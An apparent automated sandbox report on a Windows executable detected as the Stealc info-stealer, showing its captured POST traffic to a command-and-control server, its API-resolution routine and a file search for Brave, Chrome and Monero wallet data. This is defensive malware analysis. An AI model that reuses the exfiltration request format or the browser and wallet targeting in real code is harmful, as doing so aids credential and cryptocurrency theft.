Sep 26, 2024 02:40:25.141026020 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGC Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 2d 2d 0d 0a Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="message"files------AKKKFBGDHJKFHJJJJDGC--
Sep 26, 2024 02:40:25.369381905 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:25 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 02:40:25.370599985 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAKFIIJJKJJJJJJEGDA Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 2d 2d 0d 0a Data Ascii: ------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EBAKFIIJJKJJJJJJEGDA--
Sep 26, 2024 02:40:26.092384100 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:25 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	20:40:03
Start date:	25/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x760000
File size:	1'853'440 bytes
MD5 hash:	EF4D942F44362D48B109C8A182BA537D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1411403203.0000000005100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00779860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75550000,01250EA0), ref: 007798A1
GetProcAddress.KERNEL32(75550000,01250C48), ref: 007798BA
GetProcAddress.KERNEL32(75550000,01250CD8), ref: 007798D2
GetProcAddress.KERNEL32(75550000,01250E58), ref: 007798EA
GetProcAddress.KERNEL32(75550000,01250DE0), ref: 00779903
GetProcAddress.KERNEL32(75550000,012591C8), ref: 0077991B
GetProcAddress.KERNEL32(75550000,01244E60), ref: 00779933
GetProcAddress.KERNEL32(75550000,01244F60), ref: 0077994C
GetProcAddress.KERNEL32(75550000,01250EB8), ref: 00779964
GetProcAddress.KERNEL32(75550000,01250CF0), ref: 0077997C
GetProcAddress.KERNEL32(75550000,01250BD0), ref: 00779995
GetProcAddress.KERNEL32(75550000,01250D08), ref: 007799AD
GetProcAddress.KERNEL32(75550000,01244EA0), ref: 007799C5
GetProcAddress.KERNEL32(75550000,01250D38), ref: 007799DE
GetProcAddress.KERNEL32(75550000,01250D68), ref: 007799F6
GetProcAddress.KERNEL32(75550000,01244FE0), ref: 00779A0E
GetProcAddress.KERNEL32(75550000,01250D80), ref: 00779A27
GetProcAddress.KERNEL32(75550000,01250ED0), ref: 00779A3F
GetProcAddress.KERNEL32(75550000,012450A0), ref: 00779A57
GetProcAddress.KERNEL32(75550000,01250F00), ref: 00779A70
GetProcAddress.KERNEL32(75550000,01245000), ref: 00779A88
LoadLibraryA.KERNEL32(01250F30,?,00776A00), ref: 00779A9A
LoadLibraryA.KERNEL32(01250EE8,?,00776A00), ref: 00779AAB
LoadLibraryA.KERNEL32(01250F78,?,00776A00), ref: 00779ABD
LoadLibraryA.KERNEL32(01250F90,?,00776A00), ref: 00779ACF
LoadLibraryA.KERNEL32(01250F48,?,00776A00), ref: 00779AE0
GetProcAddress.KERNEL32(75670000,01250F18), ref: 00779B02
GetProcAddress.KERNEL32(75750000,01250F60), ref: 00779B23
GetProcAddress.KERNEL32(75750000,01259450), ref: 00779B3B
GetProcAddress.KERNEL32(76BE0000,012593A8), ref: 00779B5D
GetProcAddress.KERNEL32(759D0000,01244FC0), ref: 00779B7E
GetProcAddress.KERNEL32(773F0000,01259198), ref: 00779B9F
GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00779BB6

Strings

NtQueryInformationProcess, xrefs: 00779BAA

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 30462f6d289b86af155d2f797370bfde60746f395bebac043ac431dab8a2bff0
Instruction ID: 7517ef12ebbe1aef9da3a714b18aa416f5b4e574eab4c5dcb17f9ac2bc335cae
Opcode Fuzzy Hash: 30462f6d289b86af155d2f797370bfde60746f395bebac043ac431dab8a2bff0
Instruction Fuzzy Hash: FDA16EB592C210AFD794DFA8ED88A6637F9FF4E305704851AA605C3234D7399841EBD2

Function 007645C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0076460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0076479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007646AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007645E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007645D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007645DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007646B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0076474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0076462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007646CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0076477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0076475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007645F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007646D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007645C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0076471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0076466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0076473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00764713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007646C2

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: cde0130a70b996cc8df0da07bbbbbbe3c6749e93941f21125f49d22bf9994d48
Instruction ID: 7069ff65210a662c05b70a8a59973015a1f809e76e2cd988977e2ff7f70f788c
Opcode Fuzzy Hash: cde0130a70b996cc8df0da07bbbbbbe3c6749e93941f21125f49d22bf9994d48
Instruction Fuzzy Hash: 9A41F4A0FD261C7ECF2CBBA4887EF9DB7765FC6B04F505044E80896780CBB86521472A

Function 0076BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

FindFirstFileA.KERNEL32(00000000,?,00780B32,00780B2B,00000000,?,?,?,007813F4,00780B2A), ref: 0076BEF5
StrCmpCA.SHLWAPI(?,007813F8), ref: 0076BF4D
StrCmpCA.SHLWAPI(?,007813FC), ref: 0076BF63
FindNextFileA.KERNEL32(000000FF,?), ref: 0076C7BF
FindClose.KERNEL32(000000FF), ref: 0076C7D1

Strings

Preferences, xrefs: 0076C11E
Brave, xrefs: 0076C102
\Brave\Preferences, xrefs: 0076C1DB
Google Chrome, xrefs: 0076C634

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 42ef9daa0e79bd91a6e4940bd42f9848db92eca73ebf99799bf8a0de796ceb47
Instruction ID: 1e1c2e1836200f1bf6e7f4e2b873d85be1995ce30469f3f68780102dd5ad05e8
Opcode Fuzzy Hash: 42ef9daa0e79bd91a6e4940bd42f9848db92eca73ebf99799bf8a0de796ceb47
Instruction Fuzzy Hash: EF423272910104EBDF15FB74DC5AEEE737CAF94340F408568B90A96191EF38AB49CB92

Function 6CB935A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6CC1F688,00001000), ref: 6CB935D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CB935E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6CB935FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CB9363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CB9369F
__aulldiv.LIBCMT ref: 6CB936E4
QueryPerformanceCounter.KERNEL32(?), ref: 6CB93773
EnterCriticalSection.KERNEL32(6CC1F688), ref: 6CB9377E
LeaveCriticalSection.KERNEL32(6CC1F688), ref: 6CB937BD
QueryPerformanceCounter.KERNEL32(?), ref: 6CB937C4
EnterCriticalSection.KERNEL32(6CC1F688), ref: 6CB937CB
LeaveCriticalSection.KERNEL32(6CC1F688), ref: 6CB93801
__aulldiv.LIBCMT ref: 6CB93883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CB93902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CB93918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CB9394C

Strings

MOZ_TIMESTAMP_MODE, xrefs: 6CB935DB
QPC, xrefs: 6CB938FC
GTC, xrefs: 6CB93912
AuthcAMDenti, xrefs: 6CB93946
GenuntelineI, xrefs: 6CB93639

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

